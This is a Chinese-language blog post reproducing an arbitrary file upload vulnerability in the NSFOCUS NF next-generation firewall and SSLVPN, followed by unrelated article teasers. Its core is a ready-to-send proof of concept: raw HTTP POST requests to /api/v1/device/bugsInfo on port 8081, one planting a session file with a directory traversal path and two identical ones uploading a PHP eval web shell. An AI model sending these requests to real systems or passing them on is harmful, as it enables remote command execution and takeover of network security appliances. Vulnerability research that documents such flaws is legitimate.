首页 > 其他分享 >漏洞复现-绿盟 NF下一代防火墙 任意文件上传漏洞

漏洞复现-绿盟 NF下一代防火墙 任意文件上传漏洞

时间:2023-08-16 17:33:45浏览次数:41  
标签:绿盟 form .. -- NF Content 漏洞 4803b59d015026999b45993b1245f0ef data

漏洞描述:

  绿盟 SSLVPN 存在任意文件上传漏洞,攻击者通过发送特殊的请求包可以获取服务器权限,进行远程命令执行

漏洞影响:

  绿盟 SSLVPN

网络测绘:

  

 出现漏洞的端口为 8081

1 2 3 4 5 6 7 8 9 10 POST /api/v1/device/bugsInfo HTTP/1.1 Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 Host:   --1d52ba2a11ad8a915eddab1a0e85acd9 Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"   lang|s:52:"../../../../../../../../../../../../../../../../tmp/";   --1d52ba2a11ad8a915eddab1a0e85acd9--

 

 

1 2 3 4 5 6 7 8 9 10 11 POST /api/v1/device/bugsInfo HTTP/1.1 Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef Host:   --4803b59d015026999b45993b1245f0ef Content-Disposition: form-data; name="file"; filename="compose.php"     <?php eval($_POST['cmd']);?>   --4803b59d015026999b45993b1245f0ef--

  

 

1 2 3 4 5 6 7 8 9 10 11 POST /api/v1/device/bugsInfo HTTP/1.1 Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef Host:   --4803b59d015026999b45993b1245f0ef Content-Disposition: form-data; name="file"; filename="compose.php"     <?php eval($_POST['cmd']);?>   --4803b59d015026999b45993b1245f0ef--

  

标签:绿盟,form,..,--,NF,Content,漏洞,4803b59d015026999b45993b1245f0ef,data
From: https://www.cnblogs.com/1zzZ/p/17635728.html

相关文章

  • 1分钟看懂:什么是0day、1day和nday漏洞?
    把应用系统比作是保险柜,假如保险柜破了一个洞,这个洞只有少数人知道,没有传播开来,也暂时没有补救的措施,那这个洞就是0day漏洞。也就是说,这个漏洞处于相对“未知”的状态,一旦被用来发起攻击的话,就会面临“没有补丁”的情况。而1day呢,就是有洞的问题已经被公开了,保险柜主人也正在组......
  • vite打包报错:ERROR: Top-level await is not available in the configured target env
    在开发时,vita打包报错如下: 原因:ECMAScript提案Top-levelawait由MylesBorins提出,它可以让你在模块的最高层中使用await操作符。在这之前,你只能通过在async函数或asyncgenerators中使用await操作符。Top-levelawait是个新特性,打包不支持此特性。解决方案:1.......
  • 漏洞复现-金蝶云星空任意文件读取
    0x01产品简介金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以“开放、标准、社交”三大特性为数字经济时代的企业提供开放的ERP云平台。服务涵盖:财务、供......
  • windows安装使用influxdb
    一、InfluxDB下载InfluxDB的windows(64-bit)下载地址为:https://dl.influxdata.com/influxdb/releases/influxdb-1.7.7_windows_amd64.zip其中,influxd.exe为数据库服务程序,influx.exe为客户端程序,influxdb.conf配置文件;打开influxdb.conf配置文件修改三个路径,如果使用默认路径无需......
  • 漏洞复现-深信服DC数据中心管理系统 XML注入漏洞
    0x01产品简介深信服是数据中心管理系统是DC为AC饿外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件的组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。0x02漏洞概述深信服是数据中心管理系统DC存在xml外部实体注入漏洞。由于后端对传入的xml对象进......
  • 针对小程序的漏洞挖掘
    前言微信小程序默认是直接使用自己微信登陆的,我们对小程序的漏洞挖掘,关注点还是在逻辑漏洞上面,下面将从环境搭建到实例一步步讲解。环境配置工具:Burp+Fiddler+windows版本微信注:你也可以直接用burp+windows版微信,进行抓包,如果出现网络错误,直接用Fiddler抓包然后发给burp进行测试......
  • JimuReport v1.6.1版本发布,修复 Freemarker 模板注入高危漏洞
    1.6.12023-08-16更新#升级日志【漏洞通知】修复Freemarker注入漏洞,危害等级:高危描述:Freemarker模板注入导致远程命令执行,远程攻击者可利用该漏洞调用在系统上执行任意命令。Issues处理echarts提示框的位置问题#1630饼图数值显示问题#1814分组支持自定义中文排序......
  • 获取Web.config配置节
    staticstringGetAppSetting(stringkey){varappSetting=ConfigurationManager.AppSettings[key];if(string.IsNullOrEmpty(appSetting)){returnstring.Format("未配置节点"+key);......
  • pageinfo-只能读取当前条数不能获取总条数
    pageInfo的total属性是当前页记录数,如何配置使total设置成总记录数原 PageHelper.startPage(page,pageSize);LambdaQueryWrapper<Credit>queryWrapper=newQueryWrapper<Credit>().lambda().eq(Credit::getUserId,dto.getUid());......
  • 界面组件Telerik UI for WinForms R2 2023——拥有VS2022暗黑主题
    TelerikUIforWinForms拥有适用WindowsForms的110多个令人惊叹的UI控件。所有的UIforWinForms控件都具有完整的主题支持,可以轻松地帮助开发人员在桌面和平板电脑应用程序提供一致美观的下一代用户体验。TelerikUIforWinFormsR22023于今年6月份发布,此版本中集成了备受期......